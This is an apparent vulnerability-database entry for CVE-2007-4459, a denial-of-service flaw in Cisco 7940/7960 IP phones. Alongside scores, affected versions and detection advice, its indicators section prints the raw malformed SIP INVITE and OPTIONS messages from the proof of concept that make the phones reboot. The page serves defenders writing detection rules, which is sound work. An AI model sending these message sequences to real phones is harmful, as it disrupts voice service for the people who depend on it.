cbcvebase.
CVE-2007-4459
published 2007-08-21

CVE-2007-4459: Cisco IP Phone 7940 and 7960 with P0S3-08-6-00 firmware, and other SIP firmware before 8.7(0), allows remote attackers to cause a denial of service (device…

PriorityP431high7.1CVSS 2.0
AVNACMAuNCNINAC
EXPLOIT
EPSS
13.99%
96.1th percentile
Cisco IP Phone 7940 and 7960 with P0S3-08-6-00 firmware, and other SIP firmware before 8.7(0), allows remote attackers to cause a denial of service (device reboot) via (1) a certain sequence of 10 invalid SIP INVITE and OPTIONS messages; or (2) a certain invalid SIP INVITE message that contains a remote tag, followed by a certain set of two related SIP OPTIONS messages.

Affected

6 ranges
VendorProductVersion rangeFixed in
ciscovoip_phone_cp-7940<= 8.70
ciscovoip_phone_cp-7940
ciscovoip_phone_cp-7940
ciscovoip_phone_cp-7940
ciscovoip_phone_cp-7940
ciscovoip_phone_cp-7960<= 8.70

Detection & IOCsextracted from sources · hover to see the quote

commandINVITE sip:<user>@<target> SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: [email protected]\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n
commandOPTIONS sip:<user>@<target> SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: [email protected]\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n
commandOPTIONS sip:<user>@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP <src>;rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01@<src>\r\nCSeq: 21013 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n
commandINVITE sip:invaliduser@<target> SIP/2.0\r\nVia: SIP/2.0/UDP <src>;branch=02;rport\r\nFrom: ;tag=08\r\nTo: \r\nContact: \r\nCall-ID: 08@<src>\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 286
portUDP/5060
  • Detect the exploit's characteristic sequence: an INVITE with a tab character (\t) in the Via header followed by OPTIONS messages sharing the same Call-ID, which is the 3-message variant trigger.
  • Flag SIP INVITE or OPTIONS messages addressed to 'invaliduser' or using 'invalidURL' as the Request-URI host, as these are explicit exploit markers in the 10-message PoC.
  • Alert on multiple SIP INVITE/OPTIONS messages sent in rapid succession (within ~45 seconds) to the same Cisco IP Phone target over UDP, especially when Call-IDs are reused across different transaction types.
  • Monitor for SIP INVITE messages with a To: header that includes a 'tag=' parameter on initial requests (tag in To is only valid in responses/re-INVITEs), as seen in the 3-message PoC — this is a malformed SIP indicator.
  • Scope detection to the Voice VLAN; the advisory explicitly states the attacker must have access to the voice VLAN network segment where affected devices reside.
  • ·Only Cisco 7940 and 7960 IP Phones running firmware version 8.6 and prior are vulnerable; firmware version 8.7 contains the fix and is not affected.
  • ·CVE-2007-5583 is a distinct but related vulnerability affecting the same device (Cisco IP Phone 7940 firmware P0S3-08-7-00) triggered specifically by SIP INVITE Request-URIs lacking a username — do not conflate detection signatures for the two CVEs.
  • ·The vulnerability is a state management bug — the phone corrupts its state table when processing the specific SIP message sequence, resulting in a crash and reboot rather than arbitrary code execution.

CVSS provenance

nvdv2.07.1HIGHAV:N/AC:M/Au:N/C:N/I:N/A:C
vendor_cisco7.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.